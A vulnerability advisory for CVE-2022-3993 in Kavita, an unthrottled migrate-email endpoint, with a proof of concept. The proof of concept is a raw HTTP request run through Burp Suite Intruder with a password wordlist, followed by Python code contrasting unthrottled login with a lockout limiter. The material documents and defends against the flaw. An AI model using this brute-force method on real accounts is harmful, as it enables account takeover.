CVE-2022-3993: No Rate Limit On migrate-email Endpoint Leads to Brute-force Attack in kavita

Authentication Bypass by Primary Weakness in GitHub repository kareadita/kavita prior to 0.6.0.3.


The migrate-email endpoint requires the Email, Username, and Password parameters. The endpoint performs authentication but has no protection against brute-force attacks, so an attacker can try every possible password without any restriction.

CWE-307: Improper Restriction of Excessive Authentication Attempts

POC

1. Send this request to Burp Suite Intruder

POST /api/account/migrate-email HTTP/1.1
Host: 192.168.189.132:5000
Accept: application/json, text/plain, */*
DNT: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Referer: http://192.168.189.132:5000/admin/dashboard
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9,id-ID;q=0.8,id;q=0.7,ar-SA;q=0.6,ar;q=0.5
Connection: close
Content-Type: application/json
Content-Length: 67

{"Email":"[email protected]",
"Username":"admin",
"Password":"xxx"
}

2. Mark the Password value as the payload position

3. Run the attack with a 1000-entry password list; the valid admin password is recovered

Impact

An attacker can brute-force the passwords of both normal and administrative users, submitting different passwords without any restriction until they gain access to the targeted account.
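To make the weakness and the CWE-307 mitigation concrete, here is an added Python example that is not Kavita's code: a login handler that accepts unlimited attempts next to one guarded by a hypothetical per-account, per-client sliding-window limiter. The user store, credentials, wordlist, client IP and limiter parameters are all constructed for the demonstration; the lock check runs before the password comparison so that a locked account gives the same answer to right and wrong passwords.

```python
"""Added example (not Kavita's code): unthrottled login beside a
CWE-307 mitigation (failed-attempt window plus temporary lockout)."""
import time
from collections import defaultdict, deque

# Constructed credential store for the demo; a real service stores salted hashes.
USERS = {"admin": "hunter2"}

# Constructed wordlist; the correct password is the sixth entry.
SAMPLE_WORDLIST = ["123456", "password", "admin", "letmein", "qwerty", "hunter2"]


def migrate_email_unthrottled(username: str, password: str) -> bool:
    """Mirrors the advisory's behaviour: every attempt is checked, none refused."""
    return USERS.get(username) == password


class AttemptLimiter:
    """Sliding-window failure counter keyed by (account, client IP).

    Hypothetical policy: max_failures failures inside window_s seconds lock
    that key for lockout_s seconds. clock is injectable for testing.
    """

    def __init__(self, max_failures=5, window_s=60, lockout_s=300,
                 clock=time.monotonic):
        self.max_failures = max_failures
        self.window_s = window_s
        self.lockout_s = lockout_s
        self.clock = clock
        self._failures = defaultdict(deque)  # key -> timestamps of failures
        self._locked_until = {}              # key -> lock expiry time

    def is_locked(self, key) -> bool:
        until = self._locked_until.get(key)
        if until is None:
            return False
        if self.clock() >= until:            # lock expired: reset state
            del self._locked_until[key]
            self._failures.pop(key, None)
            return False
        return True

    def record_failure(self, key) -> None:
        now = self.clock()
        q = self._failures[key]
        q.append(now)
        while q and now - q[0] > self.window_s:  # drop failures outside window
            q.popleft()
        if len(q) >= self.max_failures:
            self._locked_until[key] = now + self.lockout_s

    def record_success(self, key) -> None:
        self._failures.pop(key, None)


def migrate_email_throttled(limiter, username, password, client_ip) -> str:
    """Returns 'ok', 'invalid' or 'locked'.

    The lock is checked before the password, so a locked key is refused even
    with the correct password and the attacker gets no success oracle.
    """
    key = (username, client_ip)
    if limiter.is_locked(key):
        return "locked"
    if USERS.get(username) == password:
        limiter.record_success(key)
        return "ok"
    limiter.record_failure(key)
    return "invalid"


def run_wordlist(attempt, wordlist):
    """Drives a wordlist through attempt(password) -> 'ok'|'invalid'|'locked'.

    Returns (password_found_or_None, attempts_made, locked_responses).
    """
    found, attempts, locked = None, 0, 0
    for pw in wordlist:
        attempts += 1
        result = attempt(pw)
        if result == "ok":
            found = pw
            break
        if result == "locked":
            locked += 1
    return found, attempts, locked


if __name__ == "__main__":
    unthrottled = lambda pw: "ok" if migrate_email_unthrottled("admin", pw) else "invalid"
    print("unthrottled:", run_wordlist(unthrottled, SAMPLE_WORDLIST))

    limiter = AttemptLimiter(max_failures=3)
    throttled = lambda pw: migrate_email_throttled(limiter, "admin", pw, "203.0.113.5")
    print("throttled:  ", run_wordlist(throttled, SAMPLE_WORDLIST))
```

Keying the counter by account and client together is a compromise: keying by IP alone is defeated by an attacker spreading guesses over many addresses, while keying by account alone lets anyone lock an administrator out by deliberately failing; production services usually combine both with a global rate limit and alerting on lockouts.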
